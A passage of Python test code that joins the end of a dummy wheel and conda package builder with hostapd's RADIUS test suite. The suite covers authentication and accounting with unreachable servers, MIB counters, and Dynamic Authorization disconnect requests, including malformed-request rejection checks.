with open(condarc, 'w') as f:
f.write("channels:\n"
"- defaults\n"
"- {0}".format(wheel_dir_str))
def _build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=False):
# Build fake wheels for testing
for name, version in to_build:
build_dir = join(tmpdir, name + '-' + version)
os.makedirs(build_dir)
with open(join(build_dir, 'setup.py'), 'w') as f:
f.write("from setuptools import setup; "
"setup(name='{name}', version='{version}', packages=['{name}'])"
"".format(name=name, version=version))
os.makedirs(join(build_dir, name))
with open(join(build_dir, name, '__init__.py'), 'w') as f:
f.write("__version__ = '{0}'".format(version))
subprocess.check_call([sys.executable, '-mpip', 'wheel',
'--build-option=--universal',
'-w', wheel_dir,
'.'],
cwd=build_dir)
if build_conda:
_build_dummy_conda_pkg(name, version, build_dir, wheel_dir)
def _build_dummy_conda_pkg(name, version, build_dir, dst):
# Build fake conda packages for testing
from asv.plugins.conda import _conda_lock
build_dir = os.path.abspath(build_dir)
with open(join(build_dir, 'meta.yaml'), 'w') as f:
f.write(textwrap.dedent("""\
package:
name: "{name}"
version: "{version}"
source:
path: {build_dir}
build:
number: 0
script: "python -m pip install . --no-deps --ignore-installed "
requirements:
host:
- pip
- python
run:
- python
about:
license: BSD
summary: Dummy test package
""".format(name=name,
version=version,
build_dir=util.shlex_quote(build_dir))))
conda = _find_conda()
for pyver in [PYTHON_VER1, PYTHON_VER2]:
with _conda_lock():
subprocess.check_call([conda, 'build',
'--output-folder=' + dst,
'--no-anaconda-upload',
'--python=' + pyver,
'.'],
cwd=build_dir)
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, alloc_fail, fail_test, wait_fail_trigger
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
logger.info("radiusAuthClientAccessRetransmissions: " + mib["radiusAuthClientAccessRetransmissions"])
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 1 and int(mib["radiusAccClientPendingRequests"]) < 1:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing",
"62:d:1" ]
params['radius_acct_req_attr'] = [ "126:s:Operator", "62:d:1",
"77:s:testing" ]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [ dev[0], dev[1] ]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(4.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value (req_e=%d req_s=%d)" % (req_e, req_s))
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0' }
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt).decode()):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in list(reply.keys()):
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret=b"incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="psk.user@example.com")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="psk.user@example.com",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="foo@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
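# Build a Message-Authenticator attribute for a DAE request: HMAC-MD5 keyed with the
# shared secret over the packet header (code, identifier, length), an all-zero
# Authenticator field and the encoded attributes, computed with the
# Message-Authenticator attribute itself set to 16 zero octets and then replaced by
# the resulting digest.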
def add_message_auth_req(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = b''
for code,datalst in sorted(req.items()):
for data in datalst:
attrs += req._PktEncodeAttribute(code, data)
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*b"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
